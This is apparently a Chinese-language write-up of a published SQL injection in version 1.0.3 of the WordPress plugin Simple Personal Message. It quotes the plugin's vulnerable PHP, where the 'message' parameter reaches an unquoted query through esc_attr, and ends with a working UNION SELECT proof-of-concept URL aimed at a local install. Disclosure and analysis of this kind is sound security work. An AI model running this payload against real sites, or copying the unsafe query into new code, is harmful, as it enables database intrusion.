Wordpress_Plugin_SinglePersonalMessage1.0.3 sql injection

exploit-db

# Exploit Title: Single Personal Message 1.0.3 – Plugin WordPress – Sql Injection
# Date: 28/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/simple-personal-message/
# Software Link: https://wordpress.org/plugins/simple-personal-message/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.0.3
# Tested on: Windows 8

0X01 代码分析

好不容易从github上找了份有漏洞的版本

目录结构如图

既然是注入就从交互点下手，搜索sql语句，顺着目录挨个寻找

从外到内寻找交互的地方，在admin/class-simple-personal-message-admin.php发现了几十处,例如下面这种

$user_login = esc_sql(wp_get_current_user()->user_login);

global $wpdb;

$table_name = $wpdb->prefix . 'spm_message';

$wpdb->get_results("SELECT * FROM $table_name WHERE receiver = '" . $user_login . "' AND status = 0 AND receiver_deleted = 0", OBJECT);

return $wpdb->num_rows;

然而这个里面所有的都用esc_sql过滤了

继续往里层查找，在admin/partials/simple-personal-message-admin-view.php发现

<?php

global $wpdb;

$table = $wpdb->prefix . 'spm_message';

$id = esc_attr($_GET['message']);

$message = $wpdb->get_results("SELECT * FROM $table WHERE id = $id");

$user = get_user_by('login', $message[0]->sender);

?>

可以很明显的看到

$id = esc_attr($_GET['message']);

$message = $wpdb->get_results("SELECT * FROM $table WHERE id = $id");

message没有经过过滤就拼接到sql语句中了

0x02 证明

正常状态下

拼接一下message参数

http://localhost/wordpress/wp-admin/admin.php?page=simple-personal-message-outbox&action=view&message=1%20UNION%20SELECT%201,2.3,4,5,user(),7,8,9,10,11,12%20FROM%20wp_terms%20WHERE%20term_id=1